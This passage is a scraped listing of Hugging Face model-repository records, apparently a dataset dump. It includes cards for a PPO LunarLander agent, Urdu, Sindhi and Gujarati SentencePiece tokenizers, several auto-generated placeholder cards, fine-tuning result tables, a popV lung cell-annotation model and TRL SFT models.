- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: 260.71 +/- 21.21
name: mean_reward
verified: false
---
# **PPO** Agent playing **LunarLander-v2**
This is a trained model of a **PPO** agent playing **LunarLander-v2**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
|
Sai5480/monolingual-tokenizer-native-urd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:52Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"urd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:42Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- urd
- vocab-128000
---
# Monolingual Tokenizer - Urdu (Vocab 128000)
This is a monolingual tokenizer trained on Urdu text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-urd-vocab-128000")
```
## Files
- `urd.model`: SentencePiece model file
- `urd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Urdu (urd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
Sai5480/monolingual-tokenizer-native-snd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:18Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"snd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:06Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- snd
- vocab-128000
---
# Monolingual Tokenizer - Sindhi (Vocab 128000)
This is a monolingual tokenizer trained on Sindhi text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-snd-vocab-128000")
```
## Files
- `snd.model`: SentencePiece model file
- `snd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Sindhi (snd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
Sai5480/monolingual-tokenizer-native-guj-vocab-128000
|
Sai5480
| 2025-09-23T15:40:16Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"guj",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:40:02Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- guj
- vocab-128000
---
# Monolingual Tokenizer - Gujarati (Vocab 128000)
This is a monolingual tokenizer trained on Gujarati text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-guj-vocab-128000")
```
## Files
- `guj.model`: SentencePiece model file
- `guj.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Gujarati (guj)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
ZaneHorrible/hs_adib_banglabert
|
ZaneHorrible
| 2025-09-23T15:40:05Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"electra",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:36:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Kuongan/Halphobert-large_finetuned
|
Kuongan
| 2025-09-23T15:37:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:vinai/phobert-large",
"base_model:finetune:vinai/phobert-large",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:12:40Z |
---
library_name: transformers
license: mit
base_model: vinai/phobert-large
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: Halphobert-large_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Halphobert-large_finetuned
This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7409
- Accuracy: 0.7486
- F1 Macro: 0.7478
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 20
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 1.0965 | 1.0 | 88 | 0.8876 | 0.6014 | 0.5940 |
| 0.7658 | 2.0 | 176 | 0.7050 | 0.735 | 0.7361 |
| 0.6118 | 3.0 | 264 | 0.7218 | 0.7407 | 0.7425 |
| 0.4813 | 4.0 | 352 | 0.7409 | 0.7486 | 0.7478 |
| 0.3701 | 5.0 | 440 | 0.7899 | 0.7393 | 0.7405 |
| 0.2655 | 6.0 | 528 | 0.8799 | 0.7329 | 0.7335 |
| 0.2237 | 7.0 | 616 | 0.9862 | 0.7207 | 0.7215 |
| 0.1591 | 8.0 | 704 | 1.0564 | 0.7307 | 0.7317 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
ziadrone/training_output
|
ziadrone
| 2025-09-23T15:35:12Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:shivash/enhanced-hybrid-transformer-768d",
"base_model:finetune:shivash/enhanced-hybrid-transformer-768d",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:34:46Z |
---
library_name: transformers
license: apache-2.0
base_model: shivash/enhanced-hybrid-transformer-768d
tags:
- generated_from_trainer
model-index:
- name: training_output
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# training_output
This model is a fine-tuned version of [shivash/enhanced-hybrid-transformer-768d](https://huggingface.co/shivash/enhanced-hybrid-transformer-768d) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 5.8198
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.0101 | 0.3366 | 250 | 6.9214 |
| 6.4366 | 0.6732 | 500 | 6.4452 |
| 6.1029 | 1.0094 | 750 | 6.1787 |
| 5.8866 | 1.3460 | 1000 | 6.0269 |
| 5.7574 | 1.6826 | 1250 | 5.9218 |
| 5.6024 | 2.0188 | 1500 | 5.8609 |
| 5.4617 | 2.3554 | 1750 | 5.8362 |
| 5.4463 | 2.6920 | 2000 | 5.8198 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
davidquarel/jaxgmg_ckpt_pt_OLD
|
davidquarel
| 2025-09-23T15:32:46Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-08-15T19:52:19Z |
Out of date. See https://huggingface.co/davidquarel/jaxgmg_ckpt_zip instead
|
popV/tabula_sapiens_Lung
|
popV
| 2025-09-23T15:29:49Z | 0 | 0 |
popV
|
[
"popV",
"joblib",
"biology",
"genomics",
"single-cell",
"anndata_version:0.12.2",
"scikit_learn_version:1.7.2",
"organism:Homo sapiens",
"python_version:3.12.8",
"tissue: lung",
"license:cc-by-4.0",
"region:us"
] | null | 2025-01-23T02:45:23Z |
---
library_name: popV
license: cc-by-4.0
tags:
- biology
- genomics
- single-cell
- anndata_version:0.12.2
- scikit_learn_version:1.7.2
- organism:Homo sapiens
- python_version:3.12.8
- popV
- 'tissue: lung'
---
Popular Vote (popV) model for automated cell type annotation of single-cell RNA-seq data. We provide here pretrained models
for plug-in use in your own analysis.
Follow our [tutorial](https://github.com/YosefLab/popV/blob/main/tabula_sapiens_tutorial.ipynb) to learn how to use the model for cell type annotation.
# Model description
Tabula Sapiens is a benchmark, first-draft human cell atlas of over 1.1M cells from 28 organs of 24 normal human subjects. This work is the product of the Tabula Sapiens Consortium. Taking the organs from the same individual controls for genetic background, age, environment, and epigenetic effects, and allows detailed analysis and comparison of cell types that are shared between tissues.
**Link to CELLxGENE**:
Link to the [data](https://cellxgene.cziscience.com/e/0d2ee4ac-05ee-40b2-afb6-ebb584caa867.cxg/) in the CELLxGENE browser for interactive exploration of the data and download of the source data.
**Training Code URL**:
Not provided by uploader.
# Metrics
We provide here accuracies for each of the experts and the ensemble model. The validation set accuracies are
computed on a 10% random subset of the data that was not used for training.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 2 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| capillary endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basal cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 1 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| intermediate monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD4-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD8-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of artery | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| club cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vein endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| lung ciliated cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| alveolar adventitial fibroblast | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| respiratory goblet cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| natural killer cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pericyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| B cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| adventitial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| non-classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| neutrophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of lymphatic vessel | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| bronchial smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mature NK T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasma cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vascular associated smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| myeloid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary ionocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mesothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasmacytoid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| serous cell of epithelium of bronchus | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mast cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
The train accuracies are computed on the training data.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 14833 | 0.96 | 0.98 | 0.97 | 0.98 | 0.00 | 0.95 | 0.97 | 0.96 | 0.98 |
| pulmonary alveolar type 2 cell | 10436 | 0.97 | 0.97 | 0.98 | 0.98 | 0.00 | 0.95 | 0.97 | 0.97 | 0.98 |
| capillary endothelial cell | 6474 | 0.96 | 0.96 | 0.97 | 0.97 | 0.00 | 0.97 | 0.96 | 0.97 | 0.98 |
| basal cell | 3605 | 0.93 | 0.94 | 0.94 | 0.94 | 0.00 | 0.91 | 0.95 | 0.95 | 0.96 |
| pulmonary alveolar type 1 cell | 2824 | 0.96 | 0.98 | 0.96 | 0.97 | 0.00 | 0.98 | 0.98 | 0.97 | 0.98 |
| intermediate monocyte | 2493 | 0.61 | 0.68 | 0.75 | 0.74 | 0.00 | 0.73 | 0.83 | 0.88 | 0.83 |
| CD4-positive, alpha-beta T cell | 1903 | 0.87 | 0.89 | 0.87 | 0.89 | 0.00 | 0.89 | 0.90 | 0.92 | 0.92 |
| CD8-positive, alpha-beta T cell | 1717 | 0.86 | 0.87 | 0.85 | 0.86 | 0.00 | 0.87 | 0.87 | 0.90 | 0.90 |
| endothelial cell of artery | 1584 | 0.76 | 0.81 | 0.83 | 0.82 | 0.00 | 0.83 | 0.82 | 0.83 | 0.85 |
| club cell | 1578 | 0.81 | 0.84 | 0.89 | 0.87 | 0.00 | 0.76 | 0.86 | 0.86 | 0.89 |
| classical monocyte | 1428 | 0.59 | 0.61 | 0.66 | 0.65 | 0.00 | 0.74 | 0.83 | 0.93 | 0.82 |
| basophil | 1193 | 0.98 | 0.98 | 0.99 | 0.99 | 0.00 | 0.98 | 0.98 | 0.98 | 0.99 |
| vein endothelial cell | 1187 | 0.79 | 0.83 | 0.85 | 0.84 | 0.00 | 0.84 | 0.86 | 0.88 | 0.87 |
| lung ciliated cell | 1075 | 0.96 | 0.97 | 0.98 | 0.98 | 0.00 | 0.97 | 0.98 | 0.97 | 0.98 |
| alveolar adventitial fibroblast | 1002 | 0.88 | 0.86 | 0.86 | 0.90 | 0.00 | 0.94 | 0.97 | 0.96 | 0.95 |
| respiratory goblet cell | 937 | 0.83 | 0.87 | 0.87 | 0.85 | 0.00 | 0.76 | 0.88 | 0.88 | 0.90 |
| natural killer cell | 928 | 0.91 | 0.92 | 0.91 | 0.92 | 0.00 | 0.92 | 0.95 | 0.96 | 0.96 |
| pericyte | 681 | 0.81 | 0.89 | 0.92 | 0.92 | 0.00 | 0.94 | 0.97 | 0.97 | 0.97 |
| B cell | 596 | 0.97 | 0.96 | 0.97 | 0.97 | 0.00 | 0.98 | 0.99 | 0.99 | 0.99 |
| adventitial cell | 533 | 0.81 | 0.82 | 0.79 | 0.82 | 0.00 | 0.90 | 0.96 | 0.96 | 0.93 |
| non-classical monocyte | 469 | 0.26 | 0.12 | 0.24 | 0.17 | 0.00 | 0.38 | 0.72 | 0.79 | 0.63 |
| monocyte | 464 | 0.42 | 0.33 | 0.50 | 0.48 | 0.00 | 0.62 | 0.78 | 0.87 | 0.75 |
| neutrophil | 338 | 0.95 | 0.97 | 0.96 | 0.95 | 0.00 | 0.96 | 0.97 | 0.95 | 0.99 |
| endothelial cell of lymphatic vessel | 285 | 0.98 | 0.98 | 0.97 | 0.96 | 0.00 | 0.97 | 0.99 | 0.99 | 0.98 |
| bronchial smooth muscle cell | 201 | 0.52 | 0.59 | 0.67 | 0.58 | 0.00 | 0.79 | 0.93 | 0.95 | 0.92 |
| mature NK T cell | 146 | 0.35 | 0.19 | 0.38 | 0.33 | 0.00 | 0.64 | 0.80 | 0.88 | 0.86 |
| plasma cell | 139 | 0.75 | 0.85 | 0.89 | 0.95 | 0.00 | 0.94 | 0.96 | 0.95 | 0.94 |
| vascular associated smooth muscle cell | 113 | 0.44 | 0.63 | 0.74 | 0.61 | 0.00 | 0.84 | 0.94 | 0.96 | 0.93 |
| myeloid dendritic cell | 29 | 0.00 | 0.12 | 0.76 | 0.60 | 0.00 | 0.65 | 0.87 | 0.97 | 0.95 |
| pulmonary ionocyte | 23 | 0.00 | 0.89 | 0.88 | 0.67 | 0.00 | 0.71 | 0.92 | 0.90 | 0.96 |
| mesothelial cell | 17 | 0.36 | 0.71 | 0.74 | 0.77 | 0.00 | 0.47 | 0.85 | 0.87 | 0.74 |
| plasmacytoid dendritic cell | 15 | 0.97 | 0.00 | 1.00 | 0.94 | 0.00 | 0.65 | 1.00 | 1.00 | 1.00 |
| serous cell of epithelium of bronchus | 13 | 0.00 | 0.38 | 0.00 | 0.38 | 0.00 | 0.28 | 0.79 | 0.93 | 0.63 |
| mast cell | 3 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.30 | 1.00 | 0.75 | 0.80 |
</details>
# References
Tabula Sapiens reveals transcription factor expression, senescence effects, and sex-specific features in cell types from 28 human organs and tissues, The Tabula Sapiens Consortium; bioRxiv, doi: https://doi.org/10.1101/2024.12.03.626516
|
hi-paris/CosyVoice2-EU
|
hi-paris
| 2025-09-23T15:26:25Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T15:26:25Z |
---
license: apache-2.0
---
|
noobmaster6009/Qwen3-0.6B-Gensyn-Swarm-stocky_colorful_gecko
|
noobmaster6009
| 2025-09-23T15:26:08Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am stocky_colorful_gecko",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T18:08:07Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am stocky_colorful_gecko
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
|
atrost
| 2025-09-23T15:26:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"conversational",
"base_model:Qwen/Qwen3-1.7B-Base",
"base_model:finetune:Qwen/Qwen3-1.7B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-19T15:49:43Z |
---
base_model: Qwen/Qwen3-1.7B-Base
library_name: transformers
model_name: math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
This model is a fine-tuned version of [Qwen/Qwen3-1.7B-Base](https://huggingface.co/Qwen/Qwen3-1.7B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/astrost-university-of-wisconsin-madison/sft-regularized-sft/runs/lf39js1s)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
oggyeth/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-domestic_peckish_buffalo
|
oggyeth
| 2025-09-23T15:23:14Z | 34 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
